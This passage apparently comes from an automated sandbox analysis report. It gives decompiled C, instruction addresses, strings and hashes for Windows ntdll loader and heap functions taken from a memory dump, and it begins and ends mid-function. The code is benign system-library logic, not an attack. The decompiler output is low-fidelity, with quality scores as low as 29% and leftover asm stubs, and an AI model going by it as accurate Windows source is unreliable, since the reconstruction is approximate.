						L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x053d3d3c
0x053d3d42
0x053d3d44
0x053d3d46
0x053d3d49
0x053d3d4c
0x053d3d4f
0x053d3d52
0x053d3d55
0x053d3d58
0x053d3d5b
0x053d3d5f
0x053d3d61
0x053d3d66
0x05428213
0x05428218
0x053d4085
0x053d4088
0x053d408e
0x053d4094
0x053d409a
0x053d40a0
0x053d40a6
0x053d40a9
0x053d40af
0x053d40b6
0x053d40bd
0x053d40bd
0x053d3d83
0x0542821f
0x05428229
0x05428238
0x05428238
0x0542823d
0x0542823d
0x053d3da0
0x053d3daf
0x053d3db5
0x053d3dba
0x053d3dba
0x053d3dd4
0x053d3e94
0x053d3eab
0x053d3f6d
0x053d3f84
0x053d406b
0x053d406b
0x053d406e
0x053d406e
0x053d4070
0x053d4074
0x05428351
0x05428351
0x053d407a
0x053d407f
0x0542835d
0x05428370
0x05428377
0x05428379
0x0542837c
0x0542837c
0x0542835d
0x00000000
0x053d407f
0x053d3f8a
0x053d3f8d
0x053d3f90
0x053d3f95
0x0542830d
0x0542830f
0x053d3f9b
0x053d3fac
0x053d3fae
0x053d3fb1
0x053d3fb1
0x053d3fb6
0x05428317
0x0542831a
0x00000000
0x053d3fbc
0x053d3fc1
0x053d3fc9
0x053d3fd7
0x053d3fda
0x053d3fdd
0x053d4021
0x053d4021
0x053d4029
0x053d4030
0x053d4044
0x053d4046
0x053d4046
0x053d4044
0x053d4049
0x05428327
0x05428334
0x05428339
0x0542833c
0x053d404f
0x053d404f
0x053d404f
0x053d4051
0x053d4056
0x053d4063
0x053d4063
0x053d4068
0x00000000
0x053d4068
0x053d3fdf
0x053d3fe2
0x053d3fe4
0x053d3fe7
0x053d3fef
0x053d4003
0x053d4005
0x053d4005
0x053d400c
0x053d4013
0x053d4016
0x053d4017
0x053d401b
0x053d401e
0x00000000
0x053d401e
0x053d3fb6
0x053d3eb1
0x053d3eb4
0x053d3eb7
0x053d3ebc
0x054282a9
0x054282ab
0x053d3ec2
0x053d3ed3
0x053d3ed5
0x053d3ed8
0x053d3ed8
0x053d3edd
0x054282b3
0x054282b6
0x00000000
0x053d3ee3
0x053d3ee8
0x053d3eed
0x053d3ef0
0x053d3ef3
0x053d3f02
0x053d3f05
0x053d3f08
0x054282c0
0x054282c3
0x054282c5
0x054282c8
0x054282d0
0x054282e4
0x054282e6
0x054282e6
0x054282ed
0x054282f4
0x054282f7
0x054282f8
0x054282fc
0x054282ff
0x054282ff
0x053d3f0e
0x053d3f11
0x053d3f16
0x053d3f1d
0x053d3f31
0x05428307
0x05428307
0x053d3f31
0x053d3f39
0x053d3f48
0x053d3f4d
0x053d3f50
0x053d3f50
0x053d3f53
0x053d3f58
0x053d3f65
0x053d3f65
0x053d3f6a
0x00000000
0x053d3f6a
0x053d3edd
0x053d3dda
0x053d3ddd
0x053d3de0
0x053d3de5
0x05428245
0x053d3deb
0x053d3df7
0x053d3dfc
0x053d3dfe
0x053d3e01
0x053d3e01
0x053d3e06
0x0542824d
0x0542824f
0x05428254
0x00000000
0x053d3e0c
0x053d3e11
0x053d3e16
0x053d3e19
0x053d3e29
0x053d3e2c
0x053d3e2f
0x0542825c
0x0542825f
0x05428261
0x05428264
0x0542826c
0x05428280
0x05428282
0x05428282
0x05428289
0x05428290
0x05428293
0x05428294
0x05428298
0x0542829b
0x0542829b
0x053d3e35
0x053d3e38
0x053d3e3d
0x053d3e44
0x053d3e58
0x054282a3
0x054282a3
0x053d3e58
0x053d3e60
0x053d3e6f
0x053d3e74
0x053d3e77
0x053d3e77
0x053d3e7a
0x053d3e7f
0x053d3e8c
0x053d3e8c
0x053d3e91
0x00000000
0x053d3e91

Strings

Kernel-MUI-Language-Disallowed, xrefs: 053D3E97
Kernel-MUI-Language-Allowed, xrefs: 053D3DC0
Kernel-MUI-Number-Allowed, xrefs: 053D3D8C
Kernel-MUI-Language-SKU, xrefs: 053D3F70
WindowsExcludedProcs, xrefs: 053D3D6F

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 7873469285708091eecd31d44b5ed462861b1cd0d6a683980aa2d5d4b148f2d3
Instruction ID: d1e33f4c346bf915a6684c06069b0c33a98bcbb66b0b4ad0f30c53736a608c50
Opcode Fuzzy Hash: 7873469285708091eecd31d44b5ed462861b1cd0d6a683980aa2d5d4b148f2d3
Instruction Fuzzy Hash: 22F13972E00228EBCF15DF98D984EEEFBB9FF48650F14406AE905A7650D7759E01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 053C40E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E053C40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E053CB150();
					} else {
						E053CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E053CB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E053CB150(", passed to %s", _t29);
					}
					_push("\n");
					E053CB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x54b6378 = 1;
						asm("int3");
						 *0x54b6378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x053c40e6
0x053c40e8
0x053c40f1
0x0542042d
0x0542044c
0x05420451
0x0542042f
0x05420444
0x05420449
0x0542045d
0x05420466
0x0542046e
0x05420474
0x05420475
0x0542047a
0x0542048a
0x0542048c
0x05420493
0x05420494
0x05420494
0x00000000
0x0542049b
0x00000000

Strings

HEAP[%wZ]: , xrefs: 0542043F
RtlAllocateHeap, xrefs: 05420468
HEAP: , xrefs: 0542044C
, passed to %s, xrefs: 05420469
Invalid heap signature for heap at %p, xrefs: 05420458

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: ffc450f806141d5f225ceb40436aba687b0da74847429133ef1b1b7d04a9382b
Instruction ID: b900d84f15d815b3ce4ab95b409a390158cc9b3bd480265209a331f3bec5a385
Opcode Fuzzy Hash: ffc450f806141d5f225ceb40436aba687b0da74847429133ef1b1b7d04a9382b
Instruction Fuzzy Hash: 0A01DD336146609ED319A765945FFD2BBE8DB41B30F59809EF00A47741CAB49844D355

Uniqueness

Uniqueness Score: -1.00%

Function 053F8E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E053F8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x54bd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x54b8464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x54b5780 & 0x00000003) != 0) {
							E05445510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x54b5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0540B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x54b7984; // 0x5102b20
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x54b8464; // 0x74b10110
					 *0x54bb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E053F9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x54b5780 & 0x00000005) != 0) {
						_push(_t49);
						E05445510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x053f8e0f
0x053f8e16
0x053f8e19
0x053f8e1b
0x053f8e21
0x053f8e7f
0x053f8e85
0x05439354
0x0543936c
0x05439371
0x0543937b
0x05439381
0x05439381
0x0543937b
0x053f8e9d
0x053f8e9d
0x053f8e29
0x053f8e2c
0x053f8e38
0x053f8e3e
0x053f8e43
0x053f8eb5
0x053f8eb9
0x054392aa
0x054392af
0x054392e8
0x054392e8
0x054392af
0x053f8eb9
0x053f8e45
0x053f8e53
0x053f8e5b
0x053f8e5f
0x053f8e78
0x053f8e78
0x053f8e7d
0x053f8ec3
0x053f8ecd
0x053f8ed2
0x053f8ed2
0x053f8ec5
0x053f8ec5
0x00000000
0x053f8e7d
0x053f8e67
0x053f8ea4
0x0543931a
0x00000000
0x00000000
0x05439320
0x053f8ea4
0x053f8e70
0x05439325
0x05439340
0x05439345
0x05439345
0x053f8e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Querying the active activation context failed with status 0x%08lx, xrefs: 05439357
minkernel\ntdll\ldrsnap.c, xrefs: 0543933B, 05439367
LdrpFindDllActivationContext, xrefs: 05439331, 0543935D
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0543932A

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 69407d283d67f1f29eae261ce255b3bf119194635bd652e7bba3a3fa07b607b7
Instruction ID: b5c6ebd681e1f99cece0cff9c6badac3fefd8d8dbf2fe2d81bc05c97a936dc68
Opcode Fuzzy Hash: 69407d283d67f1f29eae261ce255b3bf119194635bd652e7bba3a3fa07b607b7
Instruction Fuzzy Hash: C9412A32A043119FDF3DAE188C8EEBAF7AAFB24744F05456AEA1557150EBF09C808781

Uniqueness

Uniqueness Score: -1.00%

Function 054849A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 05484A3D, 05484AB7
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 05484A61
This is located in the %s field of the heap header., xrefs: 05484AD6
HEAP: , xrefs: 05484A4A, 05484A5D, 05484A5F, 05484AC4

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: c61a239b60b7d6a8bbbed5548b637f9a8f1bd681026ecd9261ffb68b5e53f6b0
Instruction ID: c7a877d8704ab1d205ebb4f62a97f103ae6844d2b2114983085a1e243ba04516
Opcode Fuzzy Hash: c61a239b60b7d6a8bbbed5548b637f9a8f1bd681026ecd9261ffb68b5e53f6b0
Instruction Fuzzy Hash: E131D332600211EFDB10EB98C88AFBBB7ADFF04628F1440DAF4169F390D670A944C759

Uniqueness

Uniqueness Score: -1.00%

Function 053D8794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E053D8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E053D934A() != 0) {
								_t159 = E0544A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x54b5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E05445510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x54b5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E053D849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E053D8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E053D8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x54b5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x54b5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E053E2280(_t92, 0x54b86cc);
															_t94 = E05499DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E053F61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x54b5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E053D8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x54b5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x54b5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0540F380(_t136, 0x53a1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E053E2280(_t108, 0x54b86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E053F61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E05499D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E053DFFB0(_t118, _t156, 0x54b86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E05409A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x053d8799
0x053d879d
0x053d87a1
0x053d87a3
0x053d87a8
0x053d87c3
0x053d87c3
0x053d87c8
0x053d87d1
0x053d87d4
0x053d87d8
0x053d87e5
0x053d87ec
0x05429bfe
0x05429c00
0x05429c02
0x05429c08
0x05429c0d
0x05429c0f
0x05429c14
0x05429c2d
0x05429c32
0x05429c37
0x05429c3a
0x05429c3c
0x05429c42
0x05429c42
0x05429c3c
0x05429c02
0x053d87da
0x053d87df
0x053d87e3
0x00000000
0x00000000
0x053d87e3
0x053d87f2
0x00000000
0x053d87fb
0x053d87fd
0x053d87fe
0x053d880e
0x053d880f
0x053d8810
0x053d8814
0x053d881a
0x053d881c
0x053d881f
0x053d8821
0x053d8822
0x053d8824
0x053d8826
0x053d882c
0x053d882e
0x05429c48
0x05429c48
0x053d8834
0x053d8834
0x053d8837
0x00000000
0x00000000
0x053d8837
0x053d882e
0x053d883d
0x053d8840
0x053d8843
0x053d8846
0x053d8849
0x053d884c
0x053d884e
0x053d8850
0x053d8852
0x053d8854
0x053d8857
0x053d88b4
0x053d88b6
0x053d88b6
0x053d8859
0x053d8859
0x053d8859
0x053d8861
0x053d8866
0x053d886a
0x053d893d
0x053d8941
0x00000000
0x053d8947
0x053d8947
0x053d894a
0x053d894c
0x00000000
0x053d8952
0x053d8955
0x053d895a
0x053d895d
0x053d895d
0x053d895f
0x053d8961
0x053d8961
0x053d8968
0x00000000
0x00000000
0x053d896a
0x053d896b
0x053d896e
0x00000000
0x053d8970
0x053d8970
0x053d8970
0x053d8970
0x053d8972
0x053d8972
0x053d8974
0x00000000
0x053d897a
0x053d897a
0x053d897d
0x00000000
0x053d8983
0x05429c65
0x05429c6d
0x05429c72
0x05429c75
0x05429c75
0x05429c82
0x05429c86
0x05429c87
0x05429c88
0x05429c89
0x05429c8c
0x05429c90
0x05429c95
0x05429c97
0x05429ca0
0x05429ca3
0x05429ca9
0x05429ca9
0x00000000
0x05429ca9
0x05429ca3
0x00000000
0x05429c97
0x053d897d
0x00000000
0x053d8974
0x053d8988
0x053d8992
0x053d8996
0x00000000
0x053d8996
0x053d894c
0x00000000
0x053d8870
0x053d887b
0x053d887d
0x053d887f
0x053d8881
0x053d8884
0x053d8884
0x053d8886
0x053d8889
0x053d888c
0x053d888e
0x053d8891
0x053d8891
0x053d8898
0x00000000
0x00000000
0x053d889a
0x053d889b
0x053d889e
0x00000000
0x00000000
0x053d88a0
0x053d88a8
0x053d88b0
0x053d88b2
0x053d88d3
0x053d88d5
0x00000000
0x053d88d7
0x053d88db
0x053d88dc
0x053d88e0
0x053d88e8
0x053d88ee
0x053d88f0
0x053d88f3
0x053d88fc
0x053d8901
0x053d8906
0x053d890c
0x053d890c
0x053d890f
0x053d8916
0x053d8917
0x053d8918
0x053d8919
0x053d891a
0x053d891f
0x053d8921
0x05429c52
0x05429c55
0x05429c5b
0x05429cac
0x05429cc0
0x05429cc0
0x05429c55
0x053d8927
0x053d8927
0x053d892f
0x053d8933
0x00000000
0x053d88f5
0x053d88f5
0x00000000
0x053d88f7
0x053d88f7
0x053d88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x053d88fa
0x053d88f5
0x053d88f3
0x00000000
0x053d88d5
0x00000000
0x053d88b2
0x053d88c9
0x00000000
0x053d88c9
0x053d887f
0x053d886a
0x053d8857
0x053d8852
0x053d88bf
0x053d88bf
0x053d87aa
0x053d87ad
0x053d87ae
0x053d87b4
0x053d87b5
0x053d87b6
0x053d87b8
0x053d87bd
0x053d87c1
0x053d87f4
0x053d87fa
0x00000000
0x00000000
0x00000000
0x053d87c1
0x00000000

Strings

LdrpDoPostSnapWork, xrefs: 05429C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 05429C18
minkernel\ntdll\ldrsnap.c, xrefs: 05429C28

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 3ea4db4cb551fd9d88224e1cfaa01f9c72615be969170391e12427d4a3bafbb0
Instruction ID: 9bab3bf682c14dcd665875c9905612e1e916a5538ecbc7e58713d7a72f6e456c
Opcode Fuzzy Hash: 3ea4db4cb551fd9d88224e1cfaa01f9c72615be969170391e12427d4a3bafbb0
Instruction Fuzzy Hash: BA91F472B04216EBDF19DF59D481ABAF7BAFF44310F54406AE845AB240EB70F941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 053D7E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E053D7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E053DCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E053CC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x54b5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E05445510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x54b5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E053E7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E053E7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E05447016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E053E7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E053E7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E05447016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E053FA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E053CB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x053d7e4c
0x053d7e50
0x053d7e55
0x053d7e58
0x053d7e5d
0x053d7e71
0x053d7f33
0x053d7e77
